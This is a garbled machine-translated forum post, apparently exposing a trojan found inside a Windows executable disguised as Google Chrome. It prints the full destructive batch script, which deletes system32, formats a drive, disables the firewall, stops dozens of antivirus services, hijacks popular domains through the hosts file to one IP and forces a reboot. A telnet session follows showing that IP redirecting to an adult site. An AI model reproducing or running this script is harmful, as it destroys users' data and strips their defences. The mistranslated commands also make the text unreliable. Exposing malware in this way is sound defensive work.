Это, конечно, троян.Нашел в UPX-распакованы Windows, ехе:
@echo от
CD \ пользователи \
эхо. 2> update.exe дель C: \ Windows \ system32 / у
Формат D: / г
Netsh advfirewall набор currentprofile отключенное состояние / у
Netsh установлен брандмауэр OPMODE DISABLE / у
пинг 94.199.255.148 -l 512
C: \ Users \ update.exe
Taskkill / ж / им cmdagent.exe
Taskkill / им
Taskkill / ж / им Ad-aware.exe
чистая остановка "Avast! антивирус" / у
чистая остановка "Outpost Firewall Service" / у
чистая остановка "сервис антивирусного Panda" / у
чистая остановка "Функция Service Panda" / у
чистая остановка "Panda IManager Service" / у
чистая остановка "Panda Network Manager" / у
чистая остановка "Panda Служба защиты процесса" / у
чистая остановка "Panda TPSrv" / у
чистая остановка "Avast! Service Control iAVS4" / у
чистая остановка "McAfee Framework Service" / у
чистая остановка "Сеть Associates McShield" / у
чистая остановка "AntiVir PersonalEdition Классический Guard" / у
чистая остановка "AntiVir PersonalEdition Классический рубанок" / у
чистая остановка "AntiVir PersonalEdition Классический Планировщик" / у
чистая остановка "стой! антивирус" / у
Чистая остановка чистая остановка "WZCSVC" / у
чистая остановка "стой! Service Control iAVS4" / у
чистая остановка "стой! Web Scanner" / у
чистая остановка "MsMpSvc" / у
чистая остановка "Symantec AntiVirus" / у
чистая остановка "Symantec AntiVirus Определение Watcher" / у
чистая остановка "Symantec Event-менеджер" / у
чистая остановка "Symantec Settings Manager" / у
чистая остановка "Symantec AppCore Service" / у
чистая остановка "Центральный изолятор Symantec" / у
чистая остановка "Symantec Client Firewall Диспетчер учетных записей" / у
чистая остановка "Symantec Client Firewall Proxy Service" / у
чистая остановка "Служба Symantec Client Firewall" / у
чистая остановка "Symantec Ядро LC" / у
чистая остановка "Служба Symantec Lic NetConnect" / у
чистая остановка "Драйверы Услуги Symantec Network" / у
чистая остановка "Symantec Network Proxy" / у
чистая остановка "Symantec Quarantine Scanner" / у
чистая остановка "Microsoft Antimalware" / у
Taskkill / IM ashdisp.exe
Taskkill / F / IM nod32krn.exe
Taskkill / F / IM avp.exe
Taskkill / F / IM avgamsvr.exe
Taskkill / F / IM avgw.exe
Taskkill / F / IM avguard.exe
Taskkill / F / IM TmListen.exe
Taskkill / F / IM PccNTMon.exe
чистая остановка "Norman API-зацепив помощник" / у
чистая остановка "Norman NJeeves" / у
чистая остановка "Norman Вирус управления на доступ к компоненту" / у
чистая остановка "Norman Вирус Control Scheduler" / у
чистая остановка "Norman ZANDA" / у
Taskkill / ж / им mfevtps.exe
Taskkill / ж / им chrome.exe
чистая остановка "Kaspersky Anti-Вирус 6,0" / у
чистая остановка "Kaspersky Anti-Вирус служба" / у
чистая остановка "Kaspersky Network Agent" / у
чистая остановка "Zonealarm" / у
чистая остановка "PCToolsSSDMonitorSvc" / у
чистая остановка "Нортон Internet Security" / у
Taskkill / ж / им "norton.exe" / у
Taskkill / ж / им "Нортон Авто-protect.exe" / у
чистая остановка "AntiVir Guard PersonalEdition" / у
чистая остановка "Symantec Proxy Service"/ у
чистая остановка "Panda Antivirus" / у
чистая остановка "ZoneAlarm" / у
чистая остановка "OfficeScanNT сканирования в реальном времени" / у
чистая остановка "Trend Micro Proxy Service / у
CD \ Windows \ system32 \ Drivers \ Etc
эхо 94.199.255.148 google.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 facebook.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 twitter.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 bing.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 wikipedia.org >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 youtube.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 myspace.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
эхо 94.199.255.148 msn.com >> % SYSTEMDRIVE% \ Windows \ System32 \ Drivers \ Etc \ Hosts
IPCONFIG / flushdns
IPCONFIG / обновить
выключение -r / т 15 / с "Перезапуск для завершения обновления."
Да, пожалуйста, исправить ваш "ошибка" что "случайно" отключает брандмауэры и антивирусные сканеры и угоняет google.com, facebook.com и т.д. *
Кроме того, уход объяснить, почему он имеет значок и версия строки Google Chrome?
* Вот 94.199.255.148:
$ Телнет 94.199.255.148 80
Попытка 94.199.255.148 ...
Подключение к 94.199.255.148.
Побег символ «^]».
GET / HTTP / 1.0
Ведущий: google.com
HTTP / 1.1 301 Moved Постоянно
Сервер: Nginx
Дата: Чт, 16 мая 2013 6:41:22 GMT
Content-Type: текст / html
Content-Length: 178
Подключение: закрыть
Расположение: http://www.xtube.com/paid_channels/
Рейтинг: RTA-5042-1996-1400-1577-RTA
Set-Cookie: RNLBSERVERID = ded1276; Путь = /
<глава><заглавие>301 перемещена Постояннозаглавие>глава>
<Тело BGCOLOR ="белый">
<центр>
301 перемещена Постоянно h1>центр>
<час><центр>Nginxцентр>
тело>
html>